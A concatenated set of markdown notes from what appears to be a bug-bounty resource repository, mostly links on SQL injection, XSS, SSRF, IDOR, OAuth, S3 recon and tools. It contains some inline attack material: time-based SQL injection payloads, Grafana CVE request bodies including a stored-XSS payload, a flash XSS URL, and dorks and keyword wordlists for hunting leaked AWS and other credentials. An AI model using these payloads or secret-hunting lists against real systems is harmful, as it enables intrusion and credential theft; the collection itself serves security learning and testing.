/API_Security.md: -------------------------------------------------------------------------------- 1 | ## variaty of resources to help you out on the API security path. 2 | https://dsopas.github.io/MindAPI/references/ 3 | 4 | ## Two account takeover bugs worth $4300 5 | https://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bounty 6 | 7 | ## API tips 8 | https://gowsundar.gitbook.io/book-of-bugbounty-tips/api 9 | 10 | ## One Endpoint, Two Account Takeovers 11 | https://securityflow.io/one-endpoint-two-account-takeovers/ 12 | 13 | ## How I Bought a £240.00 Annual Subscription for Bargain £0.01 14 | https://infosecwriteups.com/how-i-bought-a-240-00-annual-subscription-for-bargain-0-01-7ccbc6776545 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Practice Resources.md: -------------------------------------------------------------------------------- 1 | ## Awesome Vulnerable Applications 2 | https://github.com/vavkamil/awesome-vulnerable-apps 3 | 4 | ## awesome-android-security 5 | https://github.com/saeidshirazi/awesome-android-security 6 | 7 | ## Awesome-Hacking 8 | https://github.com/Hack-with-Github/Awesome-Hacking 9 | 10 | 11 | ## awesome api security 12 | https://github.com/arainho/awesome-api-security 13 | 14 | ## 15 | https://github.com/optiv/InsecureShop 16 | 17 | ## 18 | https://github.com/Bypass007/Learn-security-from-0 19 | 20 | ## 21 | https://github.com/kaiiyer/awesome-vulnerable 22 | 23 | ## 24 | https://github.com/saeidshirazi/awesome-android-security 25 | 26 | 27 | -------------------------------------------------------------------------------- /Cookie-Vulnerabilities.md: -------------------------------------------------------------------------------- 1 | ## CookieMonster: a tool for breaking stateless authentication 2 | https://ian.sh/cookiemonster 3 | 4 | ## Cookie Based Authentication vulnerabilities 5 | https://github.com/imran-parray/Mind-Maps/blob/master/Cookie%20Based%20Authentication%20Vulnerabilities%20-%20Harsh%20Bothra/Cookie_Based_Authentication_Vulnerabilities.png 6 | 7 | ## Overflow Trilogy ( HTTP Response Splitting with Header Overflow | Denial of Service with Cookie Bomb | DOM based Cookie Bomb ) 8 | https://blog.innerht.ml/overflow-trilogy/ 9 | 10 | ## Using Burp to Test Session Token Generation 11 | https://portswigger.net/support/using-burp-to-test-session-token-generation 12 | 13 | 14 | -------------------------------------------------------------------------------- /Account_Takeover.md: -------------------------------------------------------------------------------- 1 | ## Account Takeovers — Believe the Unbelievable 2 | https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 3 | 4 | ## Account takeover using email changing feature 5 | ``` 6 | 1. evil@a.com changes mail to 2@gmail.com (owned) -> gets email verification link 7 | 2. sends link to victim, victim opens and victims account email is updated 8 | 9 | The reason is the token wasn't tied to session of user! 10 | ``` 11 | 12 | ## change victim’s password using IDN Homograph Attack 13 | https://infosecwriteups.com/how-i-was-able-to-change-victims-password-using-idn-homograph-attack-587111843aff 14 | 15 | ## 16 | https://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b 17 | 18 | -------------------------------------------------------------------------------- /Wordlist-List/Wordlist for Secret Find secret in js and github: -------------------------------------------------------------------------------- 1 | cloudinary:// 2 | CONFIG 3 | DB_NAME 4 | DB_USER 5 | DB_PASSWORD 6 | DB_HOST 7 | bucket name 8 | Jenkins 9 | OTP 10 | oauth 11 | authoriztion 12 | password 13 | pwd 14 | ftp 15 | dotfiles 16 | JDBC 17 | key-keys 18 | send_key-keys 19 | send,key-keys 20 | token 21 | user 22 | login-signin 23 | passkey-passkeys 24 | pass 25 | secret 26 | SecretAccessKey 27 | app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY 28 | credentials 29 | config 30 | security_credentials 31 | connectionstring 32 | ssh2_auth_password 33 | aws_access_key 34 | aws_secret_key 35 | S3_BUCKET 36 | S3_ACCESS_KEY_ID 37 | S3_SECRET_ACCESS_KEY_ID 38 | S3_ENDPOINT 39 | AWS_ACCESS_KEY_ID 40 | list_aws_accounts 41 | SMTP password 42 | -------------------------------------------------------------------------------- /IDOR.md: -------------------------------------------------------------------------------- 1 | ## Here's a couple of things worth a try to get an IDOR 2 | https://threadreaderapp.com/thread/1464149386280144902.html 3 | 4 | ## IDOR through MongoDB Object IDs Prediction 5 | https://techkranti.com/idor-through-mongodb-object-ids-prediction/ 6 | 7 | ## How a simple IDOR become a $4K User Impersonation vulnerability 8 | https://shahmeeramir.com/how-a-simple-idor-become-a-4k-user-impersonation-vulnerability-705291b55c0d 9 | 10 | ## IDOR checklist 11 | https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b 12 | 13 | ## 14 | https://tech-blog.cymetrics.io/en/posts/huli/how-i-hacked-glints-and-your-resume-en/ 15 | 16 | ## 17 | https://github.com/muffyhub/Mindmaps/blob/main/IDOR%20Techniques.png 18 | 19 | 20 | -------------------------------------------------------------------------------- /SQL-Injection.md: -------------------------------------------------------------------------------- 1 | ## 1. SQL checklist 2 | 3 | https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0 4 | 5 | 6 | ## 2. 7 | https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61 8 | 9 | 10 | ``` 11 | ')) or sleep(5)=' 12 | ;waitfor delay '0:0:5'-- 13 | );waitfor delay '0:0:5'-- 14 | ';waitfor delay '0:0:5'-- 15 | ";waitfor delay '0:0:5'-- 16 | ');waitfor delay '0:0:5'-- 17 | ");waitfor delay '0:0:5'-- 18 | ));waitfor delay '0:0:5'-- 19 | ``` 20 | 21 | ## SQL Injection with FFUF and Sqlmap 22 | https://0xmahmoudjo0.medium.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-9c3bb3780e8f 23 | 24 | ## Advanced sql injection cheat sheet 25 | https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet 26 | 27 | ## upload webshell using sql 28 | https://securityonline.info/sql-injection-rce/ 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /OAuth-Vulnerability.md: -------------------------------------------------------------------------------- 1 | ## 1. OAuth Checklist 2 | 3 | https://www.binarybrotherhood.io/oauth2_threat_model.html 4 | 5 | 6 | ## 2. OAuth Misconfiguration in small time-window of attack 7 | https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6 8 | 9 | 10 | ## 3. 11 | https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1 12 | 13 | 14 | ## 4. Oauth checklist 15 | https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0 16 | 17 | 18 | ## 5. Pre-Access to Victim’s Account via Facebook Signup 19 | https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d 20 | 21 | ## 6. Exploiting OAuth: Journey to Account Takeover 22 | https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /WriteUps.md: -------------------------------------------------------------------------------- 1 | ## 1. hackerone 2 | https://hackerone.com/hacktivity 3 | 4 | ## 2. Bugreader 5 | https://bugreader.com/reports 6 | 7 | ## 3. Hackerone Reports poc videos 8 | https://github.com/bminossi/AllVideoPocsFromHackerOne 9 | 10 | ## 4. Pentesrer land 11 | https://pentester.land/list-of-bug-bounty-writeups.html 12 | 13 | ## 5. Sillydaddy 14 | https://www.sillydaddy.me/ 15 | 16 | ## 6. 17 | https://cure53.de/#publications 18 | 19 | ## 20 | https://github.com/Mr-xn/Penetration_Testing_POC 21 | 22 | ## 23 | https://kuldeep.io/posts/120-days-of-high-frequency-hunting/#ac-in-reportspostsphp-leaking-pii 24 | 25 | ## 26 | https://www.agarri.fr/en/publications.html 27 | 28 | ## 29 | https://blog.securitybreached.org/2017/11/04/access-localhost-via-virtual-host-virtual-host-enumeration/ 30 | 31 | ## 32 | https://medium.com/manomano-tech/finding-zero-day-vulnerabilities-in-the-supply-chain-28afa43b0f6e 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /AWS-Pen-Testing.md: -------------------------------------------------------------------------------- 1 | ## Testing for unauthorized file uploads on misconfigured AWS S3 buckets 2 | https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893 3 | 4 | ## aws pentesting 5 | https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898 6 | 7 | ## Bypassing and exploiting Bucket Upload Policies and Signed URLs 8 | https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/ 9 | 10 | ## How To Scan AWS's Entire IP Range to Recon SSL Certificates 11 | 12 | https://www.daehee.com/scan-aws-ip-ssl-certificates/ 13 | 14 | 15 | ## Deep Dive into AWS Penetration Testing 16 | https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898 17 | 18 | 19 | ## the-infamous-8kb-aws-waf-request-body-inspection-limitation 20 | https://kloudle.com/blog/the-infamous-8kb-aws-waf-request-body-inspection-limitation 21 | 22 | 23 | -------------------------------------------------------------------------------- /Wordlist.md: -------------------------------------------------------------------------------- 1 | ## 1.collection of wordlist 2 | https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md 3 | 4 | ## 2. Dictionary list 5 | https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a 6 | 7 | ## 3. Common speak wordlist 8 | https://github.com/pentester-io/commonspeak 9 | 10 | ## 4. AEM wordlist 11 | https://github.com/clarkvoss/AEM-List/blob/main/paths 12 | 13 | ## 5. Bug-Bounty-Wordlists 14 | https://github.com/Karanxa/Bug-Bounty-Wordlists 15 | 16 | ## 6. OneListForAll 17 | https://github.com/six2dez/OneListForAll/blob/main/onelistforallmicro.txt 18 | 19 | ## 7. Free, libre, effective, and data-driven wordlists for all! 20 | https://github.com/the-xentropy/samlists 21 | 22 | ## 8. wordlists for each versions of common web applications and content management systems (CMS) 23 | https://github.com/p0dalirius/webapp-wordlists 24 | 25 | ## 9. 26 | https://github.com/orwagodfather/WordList 27 | 28 | ## 10. Web Pentesting Fuzz dictionary, one is enough. 29 | https://github.com/TheKingOfDuck/fuzzDicts 30 | 31 | ## 11. 32 | https://github.com/p0dalirius/webapp-wordlists 33 | 34 | 35 | -------------------------------------------------------------------------------- /File-Upload.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/ 3 | 4 | 5 | ## 2. 6 | https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934 7 | 8 | ## 3. 9 | https://secgeek.net/bookfresh-vulnerability/ 10 | 11 | ## 4. 12 | https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a 13 | 14 | https://portswigger.net/kb/issues/00500980_file-upload-functionality 15 | 16 | https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/ 17 | 18 | https://hackerone.com/reports/191380 19 | 20 | https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156 21 | 22 | ## Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator 23 | https://github.com/jonaslejon/malicious-pdf 24 | 25 | ## Image Upload Exploits 26 | https://github.com/barrracud4/image-upload-exploits 27 | 28 | 29 | ## Image upload bypass with magic byte 30 | https://danielxblack.ghost.io/bypassing-file-upload-restrictions-with-a-magic-byte-and-hex-editor/ 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /BugBounty-all-payload-Resource.md: -------------------------------------------------------------------------------- 1 | ## 1. All about bug bounty 2 | https://github.com/daffainfo/AllAboutBugBounty 3 | 4 | 5 | ## 2. bughunter-handbook 6 | https://gowthams.gitbook.io/bughunter-handbook/ 7 | 8 | ## 3. Swisskyrepo payloadsAllTheThings 9 | https://github.com/swisskyrepo/PayloadsAllTheThings 10 | 11 | ## 4. Another PayloadsAllTheThings 12 | https://github.com/s0wr0b1ndef/PayloadsAllTheThings 13 | 14 | ## 5. Hacktricks 15 | https://book.hacktricks.xyz/ 16 | 17 | ## 6 howtohunt gitbook 18 | https://kathan19.gitbook.io/howtohunt/ 19 | 20 | ## 7. Ippsec all tips 21 | https://ippsec.rocks/?# 22 | 23 | ## 8. Cves and all bugs payload 24 | https://github.com/daffainfo/AllAboutBugBounty 25 | 26 | ## 9. Havkerscrolls Tips 27 | https://github.com/hackerscrolls/SecurityTips 28 | 29 | ## 10. Web Attack Cheat Sheet 30 | https://github.com/riramar/Web-Attack-Cheat-Sheet 31 | 32 | ## 11. Collection of cheat sheets useful for pentesting 33 | https://github.com/coreb1t/awesome-pentest-cheat-sheets 34 | 35 | ## 12. Golden Guide for Pentesters 36 | https://github.com/0xCGonzalo/Golden-Guide-for-Pentesting 37 | 38 | ## 13. Resources & Disclosed Reports 39 | https://github.com/HolyBugx/HolyTips/tree/main/Resources#Recon 40 | 41 | ## 14. BBRE 42 | https://labs.bugbountyexplained.com/archive 43 | 44 | 45 | -------------------------------------------------------------------------------- /JS-analysis.md: -------------------------------------------------------------------------------- 1 | ## 1. Analysis of Client-Side JavaScript 2 | https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 3 | 4 | ## 2. 5 | https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3 6 | 7 | ## 3. linkfinder tool 8 | https://github.com/GerbenJavado/LinkFinder 9 | 10 | ## 4. Tool to Find js from a web 11 | https://github.com/robre/scripthunter 12 | 13 | ## 5. a javascript change monitoring tool 14 | https://github.com/robre/jsmon 15 | 16 | ## 6. Url teacking for changes 17 | https://github.com/ahussam/url-tracker 18 | 19 | ## 7.This is a command line tool I use when I want to get notified, on Telegram (on my phone), that something has finished running (on my laptop) 20 | https://github.com/ShutdownRepo/telegram-bot-cli 21 | 22 | ## 8. Static Analysis of Client-Side JavaScript 23 | https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 24 | 25 | ## 9.JavaScript Enumeration for bug bounty hunters 26 | https://thehackerish.com/javascript-enumeration-for-bug-bounty-hunters/ 27 | 28 | ## 10. Javascript Files 29 | https://docs.google.com/presentation/d/18v_FXKm-HC3uaBotAoUDHTlOv40caA5WyvvupJRX5Uk/mobilepresent?slide=id.gaba040f84d_4_34 30 | 31 | 32 | -------------------------------------------------------------------------------- /Misc/Homoglyph.md: -------------------------------------------------------------------------------- 1 | ## Visual Spoofing 2 | https://websec.github.io/unicode-security-guide/visual-spoofing/ 3 | 4 | ## Homoglyph Attack Generator 5 | https://www.irongeek.com/homoglyph-attack-generator.php 6 | 7 | ``` 8 | 9 | Visual Spoofing attacks utilizes the characters from different languages that are visually similar. For example: These all letters [AΑ А ᗅ ᗋ ᴀ A] looks like 'A' of english, visually, however, the computer program processes these characters with their exact meanings. 10 | 11 | This is where it became an interesting tool to abuse the filters and regular expression based checks & bypass them. 12 | 13 | 14 | There are multiple attack scenarios using Visual Spoofing/Homographic Attacks: 15 | 16 | 1. Abusing the Filters & Bypassing Them 17 | 18 | - One can attempt to bypass filters for any attack category such as cross-site scripting and may have a successful execution. 19 | 20 | Ex: For example: <> tags are filters, you can try ‹› instead. (Looks visually similar but are different). 21 | 22 | 23 | 2. Domain Spoofing 24 | 25 | - Highly reliable while performing a social engineering attack. The phishing emails, websites, etc looks legit and genuine. 26 | 27 | 3. Business Logic Abuse 28 | - One can attempt to perform business logic abuse, break the parsing logics and even attempt to perform account takeovers. 29 | 30 | 4. IDN Homograph Attacks 31 | 32 | 5. And other endless misc. things one can think of (Being creative is always a plus) 33 | ``` 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /S3_Recon.md: -------------------------------------------------------------------------------- 1 | # S3 RECON TIPS: 2 | 3 | ## Method 1: 4 | Use this google dorks for finding s3 bucket 5 | site: s3.amazonaws.com 6 | 7 | ## Method 2:Github Dorks 8 | By @hunter0x7, @GodfatherOrwa 9 | 10 | 11 | org:Target "bucket_name" 12 | org:Target "aws_access_key" 13 | org:Target "aws_secret_key" 14 | org:Target "S3_BUCKET" 15 | org:Target "S3_ACCESS_KEY_ID" 16 | org:Target "S3_SECRET_ACCESS_KEY" 17 | org:Target "S3_ENDPOINT" 18 | org:Target "AWS_ACCESS_KEY_ID" 19 | org:Target "list_aws_accounts" 20 | 21 | 22 | ## Method 3: 23 | You can use many online tools which are available on GitHub to find S3 bucket of a website. I would like to list down a few of them: 24 | 25 | 1) Slurp 26 | 2) Bucket_finder 27 | 3) S3Scanner 28 | 4) Lazy S3 29 | 5) S3 Bucket Finder 30 | 31 | Almost all tools are command-line tools, You have can clone them from GitHub. 32 | 33 | ## Method 4: 34 | Use the BURP Suite and spider the target web application. BURP Spider can extract the Amazon bucket of the target web application. 35 | 36 | ## Method 5: 37 | Right-click on any image of the target application and open image in new tab. If the image URL looks like this: 38 | http://xyz.s3.amazonaws.com/images/b1.gif 39 | 40 | It means the target application is storing their data to the Amazon server and the bucket name is “xyz”. Anything before “.s3” in the URL is the bucket name of the target application. 41 | 42 | ## Method 6: 43 | Sometimes you find Amazon bucket in Content-Security-Policy Response headers 44 | 45 | ## Method 7: 46 | Online Websites https://buckets.grayhatwarfare.com/ 47 | -------------------------------------------------------------------------------- /Technologies/Grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 1. CVE-2020-13379 (Denial of Service) 3 | ``` 4 | /avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D 5 | ``` 6 | 2. CVE-2020-11110 (Stored XSS) 7 | ``` 8 | POST /api/snapshots HTTP/1.1 9 | Host: 10 | Accept: application/json, text/plain, */* 11 | Accept-Language: en-US,en;q=0.5 12 | Referer: {{BaseURL}} 13 | content-type: application/json 14 | Connection: close 15 | 16 | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} 17 | ``` 18 | 3. CVE-2019-15043 (Grafana Unauthenticated API) 19 | ``` 20 | POST /api/snapshots HTTP/1.1 21 | Host: 22 | Connection: close 23 | Content-Length: 235 24 | Accept: */* 25 | Accept-Language: en 26 | Content-Type: application/json 27 | 28 | {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} 29 | ``` 30 | 4. Default Credentials 31 | ``` 32 | Try to login using admin as username and password 33 | ``` 34 | 5. Signup Enabled 35 | ``` 36 | /signup 37 | ``` 38 | 39 | ## Exploiting Grafana 40 | https://xmind.net/m/dVAZ8k/ 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /Reconnaissance.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115 3 | 4 | ## 2. 5 | https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af 6 | 7 | ## 3. 8 | https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html 9 | 10 | ## 4. 11 | https://thehackerish.com/owasp-top-10-the-ultimate-guide/ 12 | 13 | ## 5. Recon nahamsec 14 | https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119 15 | 16 | ## 6. 17 | https://www.bugbountyhunter.com/mobile/tutorials-and-guides 18 | 19 | ## 7. Scope based Recon 20 | https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 21 | 22 | ## 8. Mind Map 23 | https://github.com/imran-parray/Mind-Maps 24 | 25 | ## 9. Github Recon 26 | https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82 27 | 28 | ## 10. Recon methodology by @xcheater 29 | https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6 30 | 31 | ## 11. 32 | https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316 33 | 34 | ## 12. Pentesterland 35 | https://pentester.land/cheatsheets/2019/04/15/recon-resources.html 36 | 37 | ## 13. Red team toolkit 38 | https://github.com/infosecn1nja/Red-Teaming-Toolkit 39 | 40 | ## 14. OSINT: Finding Email Passwords in Dumps with h8mail 41 | https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail 42 | 43 | ## 15. BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation 44 | https://github.com/Viralmaniar/BigBountyRecon 45 | 46 | ## 16. “CI Knew There Would Be Bugs Here” — Exploring Continuous Integration Services as a Bug Bounty Hunter 47 | https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/ 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /tools.md: -------------------------------------------------------------------------------- 1 | ## Subdomain Enum Tools 2 | * https://github.com/projectdiscovery/subfinder 3 | * https://github.com/OWASP/Amass 4 | * https://github.com/hannob/tlshelpers/blob/master/getsubdomain 5 | * https://github.com/tomnomnom/assetfinder 6 | 7 | ## Get Subdomains from IPs 8 | * https://github.com/SpiderLabs/HostHunter 9 | * https://github.com/infosec-au/altdns 10 | * https://github.com/ProjectAnte/dnsgen 11 | * https://github.com/blechschmidt/massdns 12 | 13 | 14 | ## Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. 15 | * https://github.com/lc/gau 16 | * 17 | 18 | 19 | ## Github Recon 20 | * https://github.com/techgaun/github-dorks 21 | * https://github.com/michenriksen/gitrob 22 | * https://github.com/eth0izzle/shhgit 23 | * https://github.com/anshumanbh/git-all-secrets 24 | * https://github.com/hisxo/gitGraber 25 | 26 | 27 | ## Get alerted if a new subdomain appears on the target 28 | * https://github.com/yassineaboukir/sublert 29 | * 30 | 31 | ## 1. Big bounty tools by m4ll0k 32 | https://github.com/m4ll0k/Bug-Bounty-Toolz 33 | 34 | ## hackingtool - All in One Hacking tool For Hackers 35 | https://hakin9.org/hackingtool-all-in-one-hacking-tool-for-hackers/ 36 | 37 | 38 | ## Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting 39 | https://github.com/hahwul/WebHackersWeapons 40 | 41 | ## Awesome Bug Bounty Tools 42 | https://github.com/vavkamil/awesome-bugbounty-tools 43 | 44 | ## pocsuite3 is an open-sourced remote vulnerability testing framework 45 | https://github.com/knownsec/pocsuite3 46 | 47 | ## secretz, minimizing the large attack surface of Travis CI 48 | https://github.com/lc/secretz 49 | 50 | ## Generates combination of domain names from the provided input 51 | https://github.com/ProjectAnte/dnsgen 52 | 53 | ## An Adavnced Automation Tool For Web-Recon Developed For Linux Systems 54 | https://github.com/Cyber-Guy1/BlackDragon 55 | 56 | ## Remove duplicate urls from input 57 | https://github.com/nytr0gen/deduplicate 58 | 59 | ## Uniscan: An RFI, LFI, and RCE Vulnerability Scanner 60 | https://securitytrails.com/blog/uniscan 61 | 62 | ## Tool Finder 63 | https://inventory.raw.pm/ 64 | 65 | ## Uniscan: An RFI, LFI, and RCE Vulnerability Scanner 66 | https://securitytrails.com/blog/uniscan 67 | 68 | ## Malicious PDF Generator 69 | https://github.com/jonaslejon/malicious-pdf 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /SSRF.md: -------------------------------------------------------------------------------- 1 | ## 1. SSRF bible 2 | https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h 3 | 4 | 5 | ## 2. Tips and tricks for ssrf 6 | https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf 7 | 8 | ## 3. SSRF payload in image upload 9 | ``` 10 | 11 | ``` 12 | 13 | ## 4. Bypass by redirect through own server 14 | https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79 15 | 16 | 17 | ## 18 | https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5 19 | 20 | 21 | ## SSRF Write-ups 22 | https://reconshell.com/awesome-ssrf-writeups/ 23 | 24 | ## how to find ssrf parameters with scant3r 25 | https://knassar702.github.io/scant3r-ssrf 26 | 27 | 28 | ## Simple SSRF Allows Access To Internal Assets 29 | https://coffeejunkie.me/Simple-SSRF/ 30 | 31 | ## On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found — Part I 32 | https://rodoassis.medium.com/on-ssrf-server-side-request-forgery-or-simple-stuff-rodolfo-found-part-i-4edf7ee75389 33 | 34 | ## Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail 35 | https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530 36 | 37 | ## How i found an SSRF in Yahoo! Guesthouse (Recon Wins) 38 | https://medium.com/@th3g3nt3l/how-i-found-an-ssrf-in-yahoo-guesthouse-recon-wins-8722672e41d4 39 | 40 | ## dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests 41 | https://hakin9.org/dnsteal-dns-exfiltration-tool-for-stealthily-sending-files-over-dns-requests/ 42 | 43 | ## Blind SSRF in URL Validator 44 | https://yasshk.medium.com/blind-ssrf-in-url-validator-93cbe7521c68 45 | 46 | ## Hacking google drive integration 47 | https://github.com/httpvoid/writeups/blob/main/Hacking-Google-Drive-Integrations.md 48 | 49 | ## Larksuite ssrf protection bypass to exfiltrate aws metadata 50 | https://sirleeroyjenkins.medium.com/bypassing-ssrf-protection-to-exfiltrate-aws-metadata-from-larksuite-bf99a3599462 51 | 52 | ## 53 | https://github.com/Damian89/extended-ssrf-search 54 | 55 | ## 56 | https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51 57 | 58 | 59 | ## An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability 60 | https://github.com/assetnote/blind-ssrf-chains 61 | 62 | ## SVG SSRFs and saga of bypasses 63 | https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /XSS.md: -------------------------------------------------------------------------------- 1 | ## 1. Browser's XSS Filter Bypass Cheat Sheet 2 | 3 | https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet 4 | 5 | ## 2. Stored XSS using file upload 6 | https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e 7 | 8 | ## 3. XSS Through Parameter Pollution 9 | https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2 10 | 11 | ## 4. XSS via HTTP Headers 12 | https://brutelogic.com.br/blog/xss-via-http-headers/ 13 | 14 | ## 5. Blind XSS in svg file 15 | ``` 16 | 17 | 20 | 26 | 27 | 28 | 33 | 34 | ``` 35 | 36 | ## 6. PostMessage XSS 37 | ``` 38 | https://medium.com/@youghourtaghannei/postmessage-xss-vulnerability-on-private-program-18e773e1a1ba 39 | ``` 40 | ## 7. Flash Based Reflected XSS 41 | ``` 42 | http://www.domain.com/jwplayer/player.swf?playerready=alert(document.domain) 43 | ``` 44 | https://hackerone.com/reports/859806 45 | 46 | ## 8. XSS in .Net 47 | https://blog.isec.pl/all-is-xss-that-comes-to-the-net/ 48 | 49 | ## 9. DOMXSS WIKI 50 | https://github.com/wisec/domxsswiki/wiki 51 | 52 | ## 10. Reflected XSS Through Insecure Dynamic Loading 53 | https://infosecwriteups.com/reflected-xss-through-insecure-dynamic-loading-dbf4d33611e0 54 | 55 | ## 11. Uber Bug Bounty: Turning Self-XSS into Good-XSS 56 | https://whitton.io/articles/uber-turning-self-xss-into-good-xss/ 57 | 58 | ## 12. Multi Domain DOM Cross Site Scripting 59 | https://coffeejunkie.me//Multi-Domain-DOM-Cross-Site-Scripting/ 60 | 61 | ## 13. Hunting for XSS with CodeQL 62 | https://medium.com/codex/hunting-for-xss-with-codeql-57f70763b938 63 | 64 | ## 14. PNG IDAT chunks XSS payload generator 65 | https://github.com/vavkamil/xss2png 66 | 67 | ## 15. XSS to Account takeover in payu.in 68 | https://blog.amanrawat.in/2021/02/01/xss-to-account-takeover-payu.html 69 | 70 | ## 16. Magic Header Blind Xss tool (deliver blind xss payloads in request headers). 71 | https://github.com/adrianscheff/pegaxss 72 | 73 | 74 | ## What Bypassing Razer's DOM-based XSS Patch Can Teach Us 75 | https://edoverflow.com/2022/bypassing-razers-dom-based-xss-filter/ 76 | 77 | 78 | ## Solving dom xss puzzles 79 | https://spaceraccoon.dev/solving-dom-xss-puzzles 80 | 81 | ## 82 | https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ 83 | 84 | ## 85 | 